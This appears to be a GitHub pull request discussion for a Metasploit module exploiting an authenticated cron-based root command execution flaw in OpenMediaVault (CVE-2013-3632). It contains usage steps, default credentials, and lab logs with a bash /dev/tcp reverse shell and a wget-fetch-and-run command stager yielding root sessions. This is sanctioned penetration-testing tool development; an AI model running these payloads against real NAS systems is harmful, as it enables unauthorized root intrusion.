rapid7
OpenMediaVault authenticated RCE [CVE-2013-3632]
This is a new module addressing an old vulnerability in OpenMediaVault, an open-source NAS solution.
The vulnerability exists within all OpenMediaVault versions starting from from 1.0.0 until the recent release 7.3.1-1 and it allows an authenticated user to create cron jobs as root on the system.
An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system.
The following releases were tested.
OpenMediaVault x64 appliances:
- openmediavault_1.9_amd64.iso
- openmediavault_2.0.13_amd64.iso
- openmediavault_2.1_amd64.iso
- openmediavault_3.0.2-amd64.iso
- openmediavault_3.0.26-amd64.iso
- openmediavault_3.0.74-amd64.iso
- openmediavault_4.0.9-amd64.iso
- openmediavault_4.1.3-amd64.iso
- openmediavault_5.0.5-amd64.iso
- openmediavault_5.5.11-amd64.iso
- openmediavault_5.6.13-amd64.iso
- openmediavault_6.0-16-amd64.iso
- openmediavault_6.0-34-amd64.iso
- openmediavault_6.0-amd64.iso
- openmediavault_6.0.24-amd64.iso
- openmediavault_6.5.0-amd64.iso
- openmediavault_7.0-20-amd64.iso
- openmediavault_7.0-32-amd64.iso
ARM64 on Raspberry PI running Kali Linux 2024-3:
- openmediavault 7.3.0-5
Installation steps to install the OpenMediaVault NAS appliance
- Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
- Here are the installation instructions for VirtualBox on MacOS.
- Download the OpenMediaVault iso images from here.
- Install the iso image in your virtualization engine.
- When installed, configure the VM appliance to your needs using the menu options.
- Boot up the VM and should be able to access the OpenMediaVault appliance either thru the console,
sshon port22or via thewebuiviahttp://your_openmediavault_ip.
You are now ready to test the module.
Verification Steps
- [ ] Start
msfconsole - [ ]
use exploit/multi/http/openmediavault_auth_cron_rce - [ ]
set rhosts <ip-target> - [ ]
set rport <port> - [ ]
set lhost <attacker-ip> - [ ]
set target <0=Unix Command, 1=Linux Dropper> - [ ]
exploit - [ ] you should get a
reverse shellorMeterpretersession depending on thepayloadandtargetsettings
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > info
Name: OpenMediaVault rpc.php Authenticated Cron Remote Code Execution
Module: exploit/multi/http/openmediavault_auth_cron_rce
Platform: Unix, Linux
Arch: cmd, x86, x64, armle, aarch64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2024-05-08
Provided by:
h00die-gr3y <[email protected]>
Brandon Perry <[email protected]>
Mert BENADAM
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
=> 0 Unix Command
1 Linux Dropper
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD openmediavault yes The OpenMediaVault password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI path of the OpenMediaVault web application
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes The OpenMediaVault username to authenticate with
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload information:
Description:
OpenMediaVault allows an authenticated user to create cron jobs as root on the system.
An attacker can abuse this by sending a POST request via rpc.php to schedule and execute
a cron entry that runs arbitrary commands as root on the system.
All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
References:
https://nvd.nist.gov/vuln/detail/CVE-2013-3632
https://packetstormsecurity.com/files/178526
https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632
View the full module info with the info -d command.
Scenarios
openmediavault_7.0-32-amd64.iso appliance Unix command - cmd/unix/reverse_bash
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.201.6
rhosts => 192.168.201.6
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > check
[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] 192.168.201.6:80 - The target is vulnerable. Version 7.0.pre.32
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target is vulnerable. Version 7.0.pre.32
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.6:60814) at 2024-07-03 12:47:54 +0000
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
exit
openmediavault_7.0-32-amd64.iso appliance Linux Dropper - linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 1
target => 1
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target is vulnerable. Version 7.0.pre.32
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/cYSPpwJI3FXafxL
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Client 192.168.201.6 (Wget/1.21.3) requested /cYSPpwJI3FXafxL
[*] Sending payload to 192.168.201.6 (Wget/1.21.3)
[*] Sending stage (3045380 bytes) to 192.168.201.6
[+] Cron payload entry successfully removed.
[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.6:44398) at 2024-07-03 12:53:49 +0000
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : openmediavault.local
OS : Debian 12.5 (Linux 6.1.0-18-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Unix command - cmd/unix/reverse_bash
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 0
target => 0
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
rhosts => 192.168.1.10
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
lhost => 192.168.1.8
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 7.3.0.pre.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-01 20:14:07 +0000
pwd
/root
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Linux Dropper - linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 1
target => 1
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
rhosts => 192.168.1.10
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
lhost => 192.168.1.8
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 7.3.0.pre.5
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:8080/DdVzoLQugqto82
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 192.168.201.10 (Wget/1.21.4) requested /DdVzoLQugqto82
[*] Sending payload to 192.168.201.10 (Wget/1.21.4)
[+] Cron payload entry successfully removed.
[*] Meterpreter session 9 opened (192.168.201.8:4444 -> 192.168.201.10:36792) at 2024-07-01 20:22:02 +0000
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.201.10
OS : Debian (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple : aarch64-linux-musl
Meterpreter : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter >
Limitations
Ensure that your WfsDelay advanced option is set to more then 60 seconds to allow cron to execute the payload.
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
Added a small change in the check method for all future versions to check the vulnerability as "Detected" because this weakness has been there since 2013 and never fixed. Future releases will probably not fix it. Contacted the lead developer, but did not get any response 👎
Quick question:
Is the choice to define an exploit as multi based on the OS platform support (Unix, Windows) or driven by the architecture support (ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, etc)? What are the guidelines?
Quick question: Is the choice to define an exploit as
multibased on the OS platform support (Unix, Windows) or driven by the architecture support (ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, etc)? What are the guidelines?
The multi directory (from my understanding) is reversed for modules that will run on both Windows and Linux. I couldn't find where this is explicitly defined in our docs although this discussion supports that understanding:
https://github.com/rapid7/metasploit-framework/pull/18205#issuecomment-1658367849
Thanks for bringing this up, this module should likely be moved to modules/exploits/unix/webapps along side our other OpenMediaVault exploit.
Great module @h00die-gr3y. Testing was as expected on either end of the affected version range for x64 devices:
openmediavault_7.0-32-amd64.iso
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.130:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target is vulnerable. Version 7.0.pre.32
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[!] Cannot access the cron services to remove the payload entry. If required, remove the entry manually.
[+] Cron payload entry successfully removed.
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.130:40128) at 2024-07-15 10:00:07 -0700
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.130:40126) at 2024-07-15 10:00:07 -0700
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
openmediavault_1.9_amd64.iso
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.134:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target is vulnerable. Version 1.9
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 3 opened (172.16.199.1:4444 -> 172.16.199.130:37626) at 2024-07-15 11:48:39 -0700
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
@jheysel-r7 I have moved the module to modules/exploits/unix/webapp/openmediavault_auth_cron_rce.rb and the documentation to documentation/modules/exploit/unix/webapp/openmediavault_auth_cron_rce.rb (see https://github.com/rapid7/metasploit-framework/pull/19298/commits/a9f8475bf56c1a9820d3e5d69988ce6bb060ba71).
I also updated the other module reference exploit/multi/http/openmediavault_cmd_exec to exploit/unix/webapp/openmediavault_cmd_exec (see https://github.com/rapid7/metasploit-framework/pull/19298/commits/5459503dc68a62cf03e54afcc3ab0e9ebc5c126a) to anticipate on the upcoming name change for this module. I presume you or your team will do this, right?
@h00die-gr3y just to correct myself the multi directory is for exploits that work on more than two platforms where the platforms are linux, windows, osx, or even android, or java.
I was just looking into moving the openmediavault_cmd_exec module. I did not realize that it exploited the same CVE as this module. I don't think we usually support two different modules that exploit the same CVE but for different versions.
I understand the login functionality differs from versions on either side of 1.0.0 although because the version is easy to detect I would think that we could just refactor the old module to accommodate the different login functionality. Is there any other reason I might not be considering as to why these modules need to be separated?
@h00die-gr3y just to correct myself the multi directory is for exploits that work on more than two platforms where the platforms are linux, windows, osx, or even android, or java.
I was just looking into moving the
openmediavault_cmd_execmodule. I did not realize that it exploited the same CVE as this module. I don't think we usually support two different modules that exploit the same CVE but for different versions.I understand the login functionality differs from versions on either side of 1.0.0 although because the version is easy to detect I would think that we could just refactor the old module to accommodate the different login functionality. Is there any other reason I might not be considering as to why these modules need to be separated?
@jheysel-r7 No worries, I can integrate this logic into this module. Let me work on this the coming days and submit a module that covers all versions. We would then depreciate the old module (openmediavault_cmd_exec). What do you think?
@h00die-gr3y thanks for being so understanding. I would think it would be best to leave the original module and just improve upon it such that we could accommodate the newer versions in the original module.
@h00die-gr3y thanks for being so understanding. I would think it would be best to leave the original module and just improve upon it such that we could accommodate the newer versions in the original module.
Ok, so we will keep the same module name openmediavault_cmd_exec but the module will move to unix/webapp and I will integrate the code. We keep this PR open for this exercise, right?
@h00die-gr3y thanks for being so understanding. I would think it would be best to leave the original module and just improve upon it such that we could accommodate the newer versions in the original module.
Ok, so we will keep the same module name
openmediavault_cmd_execbut the module will move tounix/webappand I will integrate the code. We keep this PR open for this exercise, right?
That all sounds perfect, thanks again @h00die-gr3y!
@jheysel-r7 I pushed a new update (see https://github.com/rapid7/metasploit-framework/pull/19298/commits/b65c7ecb0839f683770950e6941246b8f154867f) that now supports all versions of OpenMediaVault starting from the initial version 0.1 until the current release (7.4.2-2). I also checked the original module openmediavault_cmd_exec and after testing it only works for a very limited set of OpenMediaVault versions (in the range of 0.4.x) with only a very few supported payloads.
I am just wondering why we want keep this original module name in place (it has to be moved anyhow), because it has been a major overhaul (completely new code) and it supports all versions now. You can argue if this is just an update or complete new relaunch? I would say the latter and prefer to keep the new module name intact, launch it as replacement for the original module and decommission the original module. It would probably also makes more sense to the end users. What do you think?
Hey @h00die-gr3y thanks for pushing those changes. I had assumed that changing the module name might have some negative implications (although I wasn't sure what those would be exactly). @cdelafuente-r7 has recently educated me on the Msf::Exploit::Deprecated mixin which can be used in this scenario - especially, the moved_from method that adds an alias to the module so that the old name can still be used.
My apologies for the previous requests to leave it as is, you're good to rename and move the module as you see fit 👍
Hi @h00die-gr3y, if I understood correctly, the new module completely replaces the other one without loosing compatibility with old versions of the software. If it is the case, you can completely replace the existing module with your module, keeping the author credits as Discovery / first msf module. If you decide to move the module, please use the Msf::Exploit::Deprecated mixin and add the moved_from method to add an alias to the module. Here is an example:
https://github.com/rapid7/metasploit-framework/blob/65c56802388338c523d30e388bc6fcd15eba9270/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb#L18-L20
Thanks for updating this @h00die-gr3y ! Everything looks good to me now. I tested against versions 0.2.3 and 7.0-32, and verified I got a session. I'll go ahead and land it.
Example output:
OpenMediaVault 7.0-32 - target 0 Unix command
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit verbose=true rhosts=192.168.1.229 lhost=192.168.1.13
[+] bash -c '0<&141-;exec 141<>/dev/tcp/192.168.1.13/4444;sh <&141 >&141 2>&141'
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.229:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 7.0.pre.32
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 1 opened (192.168.1.13:4444 -> 192.168.1.229:45292) at 2024-07-30 17:10:07 +0200
id
uid=0(root) gid=0(root) groups=0(root)
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:b8:32:ce brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.1.229/24 metric 100 brd 192.168.144.255 scope global dynamic ens33
valid_lft 1623sec preferred_lft 1623sec
uname -a
Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
OpenMediaVault 7.0-32 - target 1 Linux Dropper
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit verbose=true rhosts=192.168.1.229 lhost=192.168.1.13
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.229:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 7.0.pre.32
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.13:8080/aZ37SHEXKZ2k0
[*] Generated command stager: ["wget -qO /tmp/bXJXLune http://192.168.1.13:8080/aZ37SHEXKZ2k0;chmod +x /tmp/bXJXLune;/tmp/bXJXLune;rm -f /tmp/bXJXLune"]
[*] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Client 192.168.1.229 (Wget/1.21.3) requested /aZ37SHEXKZ2k0
[*] Sending payload to 192.168.1.229 (Wget/1.21.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.229
[+] Cron payload entry successfully removed.
[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.229:41730) at 2024-07-30 17:15:01 +0200
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : openmediavault.local
OS : Debian 12.6 (Linux 6.1.0-18-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
OpenMediaVault 0.2.3 - target 0 Unix command
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit verbose=true rhosts=192.168.1.231 lhost=192.168.1.13
[+] bash -c '0<&118-;exec 118<>/dev/tcp/192.168.1.13/4444;sh <&118 >&118 2>&118'
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.231:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 0.2.3
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[+] Cron payload entry successfully removed.
[*] Command shell session 3 opened (192.168.1.13:4444 -> 192.168.1.231:59171) at 2024-07-30 17:28:07 +0200
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux openmediavault 2.6.32-5-amd64 #1 SMP Mon Oct 3 03:59:20 UTC 2011 x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:33:88:f9 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.231/24 brd 192.168.144.255 scope global eth0
OpenMediaVault 0.2.3 - target 1 Linux Dropper
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit verbose=true rhosts=192.168.1.231 lhost=192.168.1.13
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.231:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
[+] The target appears to be vulnerable. Version 0.2.3
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.13:8080/WWZawdpN9wUlDn
[*] Generated command stager: ["wget -qO /tmp/INbhZDgX http://192.168.1.13:8080/WWZawdpN9wUlDn;chmod +x /tmp/INbhZDgX;/tmp/INbhZDgX;rm -f /tmp/INbhZDgX"]
[*] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 192.168.1.231 (Wget/1.12 (linux-gnu)) requested /WWZawdpN9wUlDn
[*] Sending payload to 192.168.1.231 (Wget/1.12 (linux-gnu))
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.231
[+] Cron payload entry successfully removed.
[*] Meterpreter session 4 opened (192.168.1.13:4444 -> 192.168.1.231:59173) at 2024-07-30 17:32:07 +0200
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : openmediavault.localdomain
OS : Debian 6.0.3 (Linux 2.6.32-5-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Release Notes
This adds a new module that leverages a vulnerability in OpenMediaVault versions starting from 1.0 until the recent release 7.4.2-2. This vulnerability (CVE-2013-3632) allows an authenticated user to create cron jobs as root on the system and achieve remote code execution.
Release Notes
This adds a new module that leverages a vulnerability in OpenMediaVault versions starting from 1.0 until the recent release 7.4.2-2. This vulnerability (CVE-2013-3632) allows an authenticated user to create cron jobs as root on the system and achieve remote code execution.
Actually it supports versions from 0.2 until recent release.